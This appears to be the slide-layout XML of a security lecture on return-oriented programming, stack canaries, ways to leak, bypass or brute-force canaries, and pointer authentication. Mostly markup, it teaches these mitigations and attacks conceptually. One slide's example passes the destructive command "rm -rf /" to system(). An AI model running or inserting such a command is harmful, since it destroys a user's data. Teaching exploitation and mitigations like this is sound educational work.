          <p:nvSpPr>
            <p:cNvPr id="408" name="Google Shape;408;p53"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1295625" y="1137753"/>
              <a:ext cx="37407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We jumped into the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system</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en"/>
                <a:t> function, and it expects the first argument to be 4 bytes above the ESP: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"rm -rf /"</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en"/>
                <a:t>!</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="409" name="Google Shape;409;p53"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="408" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5036325" y="1553403"/>
              <a:ext cx="1185300" cy="10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10" name="Google Shape;410;p53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12" name="Google Shape;412;p53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18" name="Google Shape;41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executing an existing function, execute your own code by executing different pieces of different code!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don’t need to jump to the beginning of a function: We can jump into the middle of it to just take the code chunks that we need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Gadget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: A small set of assembly instructions that already exist in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Gadgets usually end in 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Gadgets are usually </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> full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ROP strategy: We write a chain of return addresses starting at the RIP to achieve the behavior we want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return address points to a gadget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gadget executes its instructions and ends with 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 jumps to the address of the next gadget on the stack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="419" name="Google Shape;41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Let’s say our shellcode involves the following sequence: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is present in memory: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&lt;foo+7&gt;  addl $4, %esp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&lt;foo+10&gt; xorl %eax, %ebx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&lt;foo+12&gt; ret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&lt;bar+22&gt; andl $1, %edx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&lt;bar+25&gt; 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&lt;bar+30&gt; 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we chain returns to run the code sequence we want?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="426" name="Google Shape;426;p5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27" name="Google Shape;42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safer programming languages.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to write memory-safe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33" name="Google Shape;43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Let’s say our shellcode involves the following sequence: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endParaRPr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is present in memory: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&lt;foo+7&gt;  addl $4, %esp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&lt;foo+10&gt; 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&lt;foo+12&gt; ret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&lt;bar+22&gt; andl $1, %edx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&lt;bar+25&gt;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&lt;bar+30&gt; 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we chain returns to run the code sequence we want?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="434" name="Google Shape;434;p5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35" name="Google Shape;435;p56"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2474300" y="2900725"/>
            <a:ext cx="3600600" cy="1366050"/>
            <a:chOff x="2474300" y="2900725"/>
            <a:chExt cx="3600600" cy="1366050"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="436" name="Google Shape;436;p56"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3308900" y="2900725"/>
              <a:ext cx="27660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we jump 25 bytes after the start of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bar</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en"/>
                <a:t> then 10 bytes after the start of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foo</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en"/>
                <a:t>, we get the result we want!</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="437" name="Google Shape;437;p56"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="436" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="2714600" y="3195175"/>
              <a:ext cx="5943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8" name="Google Shape;438;p56"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="436" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="2474300" y="3424075"/>
              <a:ext cx="834600" cy="84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39" name="Google Shape;43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45" name="Google Shape;445;p57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46" name="Google Shape;446;p57"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="44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Google Shape;447;p57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48" name="Google Shape;448;p57"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="447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449" name="Google Shape;449;p5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50" name="Google Shape;450;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="102700" y="1207250"/>
            <a:ext cx="2584800" cy="1015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&lt;bar+25&gt;]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&lt;foo+10&gt;]</a:t>
            </a:r>
            <a:endParaRPr sz="10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... (more chains)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57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3139125" y="956700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57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2761159" y="3001964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53" name="Google Shape;453;p57"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="452" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3076159" y="3109664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57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61" name="Google Shape;461;p5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62" name="Google Shape;462;p58"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="461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58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="102700" y="1207250"/>
            <a:ext cx="2584800" cy="1015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&lt;bar+25&gt;]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&lt;foo+10&gt;]</a:t>
            </a:r>
            <a:endParaRPr sz="10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... (more chains)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58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58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2761159" y="3160858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66" name="Google Shape;466;p58"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="465" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3076159" y="3268558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7" name="Google Shape;46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8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69" name="Google Shape;4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8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71" name="Google Shape;471;p58"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="470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2" name="Google Shape;472;p58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74" name="Google Shape;474;p58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475" name="Google Shape;475;p5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76" name="Google Shape;476;p58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59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2761159" y="3306764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84" name="Google Shape;484;p59"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="483" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3076159" y="3414464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5" name="Google Shape;48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9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87" name="Google Shape;4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9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59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5305375" y="442163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490" name="Google Shape;490;p59"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="489" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5786275" y="459098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59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92" name="Google Shape;492;p59"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="491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494" name="Google Shape;494;p59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5" name="Google Shape;495;p59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496" name="Google Shape;496;p5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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="502" name="Google Shape;502;p6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03" name="Google Shape;503;p60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60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2761159" y="3472152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05" name="Google Shape;505;p60"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="504" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3076159" y="3579852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06" name="Google Shape;5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0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08" name="Google Shape;5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0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60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5337388" y="345416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11" name="Google Shape;511;p60"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="5756000" y="3454161"/>
            <a:ext cx="488700" cy="12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2" name="Google Shape;512;p60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513" name="Google Shape;513;p60"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="512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4" name="Google Shape;51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515" name="Google Shape;515;p60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6" name="Google Shape;516;p60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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="522" name="Google Shape;522;p6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23" name="Google Shape;523;p61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61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2761159" y="3618058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25" name="Google Shape;525;p61"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="524" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3076159" y="3725758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26" name="Google Shape;52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1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28" name="Google Shape;5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1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61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31" name="Google Shape;531;p61"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="53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533" name="Google Shape;533;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5317650" y="3023709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34" name="Google Shape;534;p61"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5779200" y="3193059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5" name="Google Shape;535;p61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6" name="Google Shape;536;p61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42" name="Google Shape;542;p62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62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2761159" y="22502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44" name="Google Shape;544;p62"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="543" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3076159" y="23579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45" name="Google Shape;5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47" name="Google Shape;5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2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62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50" name="Google Shape;550;p62"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="549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1" name="Google Shape;55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552" name="Google Shape;552;p62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53" name="Google Shape;553;p6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54" name="Google Shape;554;p62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5" name="Google Shape;555;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5317650" y="278553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56" name="Google Shape;556;p62"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5779200" y="2954881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62" name="Google Shape;562;p63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63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2761159" y="2396186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64" name="Google Shape;564;p63"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="563" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3076159" y="2503886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65" name="Google Shape;5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67" name="Google Shape;5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3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63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70" name="Google Shape;570;p63"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="569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1" name="Google Shape;57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572" name="Google Shape;572;p63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73" name="Google Shape;573;p6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74" name="Google Shape;574;p63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5" name="Google Shape;575;p63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5317650" y="278553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76" name="Google Shape;576;p63"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5779200" y="2954881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82" name="Google Shape;582;p64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64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2761159" y="13358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84" name="Google Shape;584;p64"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="583" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3076159" y="14435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5" name="Google Shape;5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4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87" name="Google Shape;58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4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64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5305500" y="247819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90" name="Google Shape;590;p64"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="589" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5786400" y="264754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p64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92" name="Google Shape;592;p64"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="59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3" name="Google Shape;59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594" name="Google Shape;594;p64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95" name="Google Shape;595;p6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96" name="Google Shape;596;p64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602" name="Google Shape;602;p65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65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2761159" y="14882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604" name="Google Shape;604;p65"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="603" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3076159" y="15959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05" name="Google Shape;60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5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607" name="Google Shape;6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5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65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5305500" y="247819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610" name="Google Shape;610;p65"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="609" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5786400" y="2647548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65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612" name="Google Shape;612;p65"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="61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13" name="Google Shape;613;p65"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="139675" y="1253400"/>
            <a:ext cx="3289200" cy="1477500"/>
            <a:chOff x="139675" y="1253400"/>
            <a:chExt cx="3289200" cy="1477500"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="614" name="Google Shape;614;p65"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="139675" y="1253400"/>
              <a:ext cx="2049000" cy="1477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ret</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en"/>
                <a:t> instruction always pops off the bottom of the stack, so execution continues based on the chain of addresses!</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="615" name="Google Shape;615;p65"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="2188675" y="1675650"/>
              <a:ext cx="1240200" cy="31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16" name="Google Shape;616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617" name="Google Shape;617;p65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618" name="Google Shape;618;p6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Memory-Safe Languages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624" name="Google Shape;624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code base is big enough (imports enough libraries), there are usually enough gadgets in memory for you to run any shellcode you want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ROP compilers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> can automatically generate a ROP chain for you based on a target binary and desired malicious code!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Non-executable pages is not a huge issue for attackers nowadays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writable and executable pages makes an attacker’s life easier, but not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> much easier</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="625" name="Google Shape;625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Stack Canaries</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="631" name="Google Shape;631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Stack canaries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640" name="Google Shape;640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641" name="Google Shape;6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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="654" name="Google Shape;654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Add a sacrificial value on the stack, and check if it has been changed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program runs, generate a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>random</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> secret value and save it in the canary storage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function prologue, place the canary value on the stack right below the SFP/RIP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function epilogue, check the value on the stack and compare it against the value in canary storage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canary value is never actually used by the function, so if it changes, somebody is probably attacking our system!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="655" name="Google Shape;655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Canaries: Properties</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="661" name="Google Shape;661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canary value is unique every time the program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>runs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> but the same for all functions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>within a run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canary value uses a NULL byte as the first byte to mitigate string-based attacks (since it terminates any string before it)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 format string vulnerability with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/>
              <a:t> might try to print everything on the stack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null byte in the canary will mitigate the damage by stopping the print earlier.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="662" name="Google Shape;66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</p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="668" name="Google Shape;668;p7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🐦🐦🐦 canary 🐦🐦🐦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69" name="Google Shape;669;p72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428600" y="2520050"/>
            <a:ext cx="45915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pushl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movl %esp,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subl $24,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($CANARY_ADDR), %eax # Load canary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%eax, -4(%ebp)       # Save on stack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-4(%ebp), %eax       # Load stack value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cmpl %eax, ($CANARY_ADDR) # Compare to canary and...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jne canary_failed         # ... crash if not equal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72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428600" y="1475850"/>
            <a:ext cx="2186100" cy="800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71" name="Google Shape;671;p72"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2836350" y="1352700"/>
            <a:ext cx="3404700" cy="2245050"/>
            <a:chOff x="2836350" y="1352700"/>
            <a:chExt cx="3404700" cy="2245050"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="672" name="Google Shape;672;p72"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2836350" y="1352700"/>
              <a:ext cx="24582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Because the write starts at name, the attacker has to overwrite the canary before the RIP or SFP!</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="673" name="Google Shape;673;p72"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="672" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5294550" y="1876050"/>
              <a:ext cx="946500" cy="172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74" name="Google Shape;674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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="675" name="Google Shape;675;p72"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1935325" y="2328200"/>
            <a:ext cx="3195300" cy="831300"/>
            <a:chOff x="1935325" y="2328200"/>
            <a:chExt cx="3195300" cy="831300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="676" name="Google Shape;676;p72"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2672425" y="2328200"/>
              <a:ext cx="24582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Note: 20 bytes for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/>
                <a:t> + 4 bytes for canary (32-bit architecture)</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="677" name="Google Shape;677;p72"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="676" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="1935325" y="2743850"/>
              <a:ext cx="737100" cy="39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Canaries: Efficiency</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="683" name="Google Shape;683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inserts a few extra instructions, so there is more overhead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almost all applications, the performance impact is insignificant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cheap way to stop lots of common attacks!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="684" name="Google Shape;684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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="690" name="Google Shape;690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Leak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> the value of the canary: Overwrite the canary with itself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Bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> the value of the canary: Use a random write, not a sequential write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Guess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> the value of the canary: Brute-force</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="691" name="Google Shape;691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Leaking the Canary</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="697" name="Google Shape;697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vulnerability that leaks stack memory could be used to leak the canary’s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Format string vulnerabilities let you print out values on the stack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 learn the value of the stack canary, place it in the exploit such that the canary is overwritten with itself, so the value is unchanged!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="698" name="Google Shape;698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Bypassing the Canary</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="704" name="Google Shape;704;p7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stop attacks that write to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>increasing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>consecutive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> addresses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>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the stack diagram: Writing upwards, with no gaps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common functions only write this way, e.g.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fread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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do not stop attacks that write to memory in other ways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write </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>around</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> the canary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Format string vulnerabilities let an attacker write to any location in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Heap overflows never overwrite a stack canary (they write to the heap)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C++ vtable exploits overwrite the vtable pointer without overwriting the canary</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="705" name="Google Shape;705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Use safer programming languages.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to write memory-safe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32-bit systems: 24 bits to guess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that the first byte (8 bits) is always a NULL byte: 32 - 8 = 24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64-bit systems: 56 bits to guess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64 - 8 = 56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are less effective on 32-bit systems since there are only 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" baseline="30000"/>
              <a:t>24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> possibilities (~16 million), which can feasibly be brute-forced</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="711" name="Google Shape;711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Guessing the Canary</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="712" name="Google Shape;712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feasible is guessing the canary?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depends on your threat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you running the program?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program is running on your own computer, you can keep trying with nobody to stop you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program is running on a remote server, the server might see you sending the exploit over and over and reject your requests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program have a timeout?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Timeout: A mandatory waiting period after a failed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timeout: 10,000 tries per second = 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" baseline="30000"/>
              <a:t>24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> tries in around 30 minutes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0.1 second timeout: 10 tries per second = 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" baseline="30000"/>
              <a:t>24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> tries in around 3 weeks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complicated timeouts are possible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consecutive failures causes a 10-minute timeout: 1 try per minute = 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" baseline="30000"/>
              <a:t>24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> tries in ~32 years!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Exponentially growing timeout (the timeout doubles for each failure): 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" baseline="30000"/>
              <a:t>24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> tries is not happening</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="718" name="Google Shape;718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Guessing the Canary</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="719" name="Google Shape;71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Pointer Authentication</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="725" name="Google Shape;72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Mitigation: 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Pointer authentication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732" name="Google Shape;732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733" name="Google Shape;73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32-Bit and 64-Bit Processors</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="739" name="Google Shape;739;p8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658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32-bit processor: integers and pointers are 32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address 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" baseline="30000"/>
              <a:t>32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> bytes ≈ 4 GB of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64-bit processor: integers and pointers are 64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address 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" baseline="30000"/>
              <a:t>64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> bytes ≈ 18 exabytes ≈ 18 billion GB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modern computer can support this much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the best most modern computers only need 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" baseline="30000"/>
              <a:t>42</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> bytes ≈ 4 terabytes ≈ 4000 GB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most 42 bits are needed to address all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22 bits are left unused (the top 22 bits in the address are always 0)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="740" name="Google Shape;740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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="746" name="Google Shape;746;p8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stack canaries: A secret value stored in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secret value changes, detect an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canary per function on the stack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Instead of placing the secret value below the pointer, store a value in the pointer itself!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the unused bits in a 64-bit address to store a secret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storing a pointer in memory, replace the unused bits with a </a:t>
            </a:r>
            <a:r>
